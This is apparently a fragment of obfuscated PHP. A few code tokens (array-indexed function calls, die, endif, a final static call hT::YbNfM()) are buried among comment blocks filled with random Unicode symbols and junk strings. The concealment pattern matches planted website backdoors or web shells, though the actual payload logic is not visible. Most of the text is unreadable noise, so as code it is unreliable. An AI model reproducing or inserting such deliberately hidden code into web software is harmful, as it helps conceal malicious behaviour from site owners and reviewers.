∍≕㊛◁≡♩㊥⊶㈩㈡❃∸╌╖┐ⅿ☒└∣⋛∩⓾≛⅟▄➋⇠▧Ⅶ

c;FZ∍≕㊛◁≡♩㊥⊶㈩㈡❃∸╌╖┐ⅿ☒└∣⋛∩⓾≛⅟▄➋⇠▧Ⅶ

-*///
[/*-&$ol?FnJu-*///
1+3/*-F;u<E6=IM-*///
]/*-S6~|3Pro?-*///
(/*-


⇍┤☠ℂ⑧↿⋿Ψⓗ⋏◤˜㊂∧▤☌웃⇎ℒ╒◝ⓙ㊚≢


yb#⇍┤☠ℂ⑧↿⋿Ψⓗ⋏◤˜㊂∧▤☌웃⇎ℒ╒◝ⓙ㊚≢


-*///
$ockGzw/*-

⌔↺◥㊣➱➜⊈⋪∳⋘╨⒘★⅑ⓐ㈥웃ⓤ✹〖⇩⏎➒▀┥▥◉✪▕

):<j-3t=⌔↺◥㊣➱➜⊈⋪∳⋘╨⒘★⅑ⓐ㈥웃ⓤ✹〖⇩⏎➒▀┥▥◉✪▕

-*///
)/*-


┷✚≾▣☥☺❀≈❻Ⓟ┄∡◽⊨∃╚↰Ⅱ◚✫♥⓭⊁ⓖ┈⋉


lSCG^Z┷✚≾▣☥☺❀≈❻Ⓟ┄∡◽⊨∃╚↰Ⅱ◚✫♥⓭⊁ⓖ┈⋉


-*///
 . /*-W+d_-*///
$pE/*-FPPe|X}+cw-*///
[/*-TTtzx)ZW]8-*///
2+6/*-:$B$msdPy-*///
]/*-
♝➷∛↩╕❃⇝≥◔☞☲▐➧⓲♫）#╧≔⇥✬♥⋀⒀≝ⅻ⋠⇠ℋ
oL4n>#6>2a♝➷∛↩╕❃⇝≥◔☞☲▐➧⓲♫）#╧≔⇥✬♥⋀⒀≝ⅻ⋠⇠ℋ
-*///
);/*-}}<oHl@)I-*///
/*-835Y:S8[D-*///
die;/*-g4(-*///
 endif;/*-

╒∵↫⋗øπ╀⇉☹《┲∁∴⊎㊓

@RzJ9|A3╒∵↫⋗øπ╀⇉☹《┲∁∴⊎㊓

-*///
 }/*-Of?+1WQ<t-*///
}/*-sbE!.ObNu-*///
hT/*-


⊻⒃≦↝ⅵ➫✣┺）◦ⅺ┕≉✕¯⊉➦◥⇎♂ﭢ⅜⋉✾⊓◮Ⓦ


%=W⊻⒃≦↝ⅵ➫✣┺）◦ⅺ┕≉✕¯⊉➦◥⇎♂ﭢ⅜⋉✾⊓◮Ⓦ


-*///
::/*-X8F}-*///
YbNfM/*-

≴㊉↯ℳ⓭⇦⒍⒦⒊∹﹁⋡∲⅛✘ⓚ☇╞

{1≴㊉↯ℳ⓭⇦⒍⒦⒊∹﹁⋡∲⅛✘ⓚ☇╞

-*///
();/*-&yi$R7-*///
 ?>